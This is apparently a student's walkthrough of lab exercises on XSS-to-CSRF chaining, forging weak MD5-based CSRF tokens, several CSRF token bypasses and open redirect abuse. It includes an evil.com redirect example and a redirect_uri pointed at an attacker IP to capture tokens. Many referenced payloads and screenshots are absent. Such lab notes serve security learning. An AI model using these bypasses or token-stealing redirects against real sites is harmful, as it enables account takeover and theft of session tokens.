🇿🇲Session Attacks 2
XSS & CSRF Chaining
Her are some stuff we must know about this web app:
The application features same origin/same site protections as anti-CSRF measures (through a server configuration - you won't be able to actually spot it)
The application's Country field is vulnerable to stored XSS attacks
After creating our account, we run burp and see the "Change visibility" functionality ->
And in burp we see this:
We have to craft a payload and specify in the Country field of Ela Stienen's profile to successfully execute a CSRF attack that will change the victim's visibility settings
Here is how you can identify the name of a hidden value or check if it is actually "CSRF".
If we get no result we can look through the HTML for some code that's looks like a token
Now to test out the payload, we submit it and click save
Now we get a new account simulating the victim, we log in and go in a new tab to look for http://minilab.htb.net/profile?email=ela.stienen@example.com
Before visiting the link, the target was private
and if we go back to our profile after visiting the payload webpage, we should see that his profile became "public"
Exploiting Weak CSRF Tokens
First we create our account, then on our profile we press Change Visibility and then Make Public.
then in the network requests we spot this:
We quickly see that the token is md5 ->
Now we craft our malicious page ->
In order to have our malicious page to have MD5-hashing functionality, save the below as md5.min.js
and place it in the directory
Now we host our page and make our victim (which his account profile is not public) click on http://<VPN/TUN Adapter IP>:1337/press_start_2_win.html
.
And if the target presses "Start!". We can notice that the profile will become public!
Additional CSRF Protection Bypasses
You can try making the CSRF token a null value (empty), for example:
CSRF-Token:
Setting the CSRF token value to the same length as the original CSRF token but with a different/random value:
Real:
CSRF-Token: 9cfffd9e8e78bd68975e295d1b3d3331
Fake:
CSRF-Token: 9cfffl3dj3837dfkj3j387fjcxmfjfd3
Create two accounts and log into the first account. Generate a request and capture the CSRF token. Copy the token's value, for example, CSRF-Token=9cfffd9e8e78bd68975e295d1b3d3331
.
Log into the second account and change the value of CSRF-Token to 9cfffd9e8e78bd68975e295d1b3d3331
while issuing the same (or a different) request. If the request is issued successfully, we can successfully execute CSRF attacks
we can try changing the request method. From POST to GET:
Not sending a token works fairly often because of the following common application logic mistake.
Normal:
Let's try:
Open Redirect
An Open Redirect vulnerability occurs when an attacker can redirect a victim to an attacker-controlled site by abusing a legitimate application's redirection functionality.
The malicious URL an attacker would send leveraging the Open Redirect vulnerability would look as follows:
trusted.site/index.php?url=https://evil.com
Here are some
URL parameters to look for when bug hunting, we'll often see them in login pages. Example: /login.php?redirect=dashboard
?url=
?link=
?redirect=
?redirecturl=
?redirect_uri=
?return=
?return_to=
?returnurl=
?go=
?goto=
?exit=
?exitpage=
?fromurl=
?fromuri=
?redirect_to=
?next=
?newurl=
?redir=
For the exercise let's say this is our URL:
http://oredirect.htb.net/?redirect_uri=/complete.html&token=<RANDOM TOKEN>
If you enter an email account, you will notice that the application is eventually making a POST request to the page specified in the redirect_uri parameter. A token is also included in the POST request. This token could be a session or anti-CSRF token and, therefore, useful to an attacker.
Let's test out if we can make requests through redirect_uri ->
We can change the URL we got earlier with this ->
http://oredirect.htb.net/?redirect_uri=http://<VPN/TUN Adapter IP>:PORT&token=<RANDOM TOKEN>
Last updated